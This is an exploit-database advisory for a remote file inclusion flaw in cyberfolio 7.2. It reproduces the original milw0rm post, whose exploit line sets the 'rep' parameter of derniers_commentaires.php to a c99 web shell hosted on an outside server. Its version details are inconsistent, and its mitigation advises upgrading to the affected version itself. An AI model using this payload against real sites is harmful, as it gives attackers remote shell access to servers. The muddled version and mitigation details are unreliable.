cyberfolio 7.2 Remote File Include Vulnerability

vendor:

cyberfolio

by:

RoMaNcYxHaCkEr

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: cyberfolio

Affected Version From: 7.2

Affected Version To: 7.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:cyberfolio:cyberfolio

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

cyberfolio 7.2 Remote File Include Vulnerability

A vulnerability in cyberfolio 7.2 allows remote attackers to include and execute arbitrary files via a URL in the rep parameter to derniers_commentaires.php.

Mitigation:

Upgrade to the latest version of cyberfolio 7.2

Source

Exploit-DB raw data:

-==========================================[ ViVa Islam + YeMeN ]====================================-

# Name : cyberfolio 7.2 Remote File Include Vulnerabiliy

# Download From : http://cyberfolio.org/sources/version7.10/cyberfolio_7_12.zip

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )        

# Home Page :  www.4rxh.com     &         www.nb3.cc        

+======================================================================================================================+

# Exploits :

http://WwW.4RxH.CoM/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://rxh.freehostia.com/shells/c99in.txt?

That,s It,s

Good Luck Everybody

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum & Anyone Hate Me  :) 

# For Contact : webmaster@4rxh.com

# bEST wISHES

-==========================================[ ViVa Islam + YeMeN ]====================================-

# milw0rm.com [2008-05-08]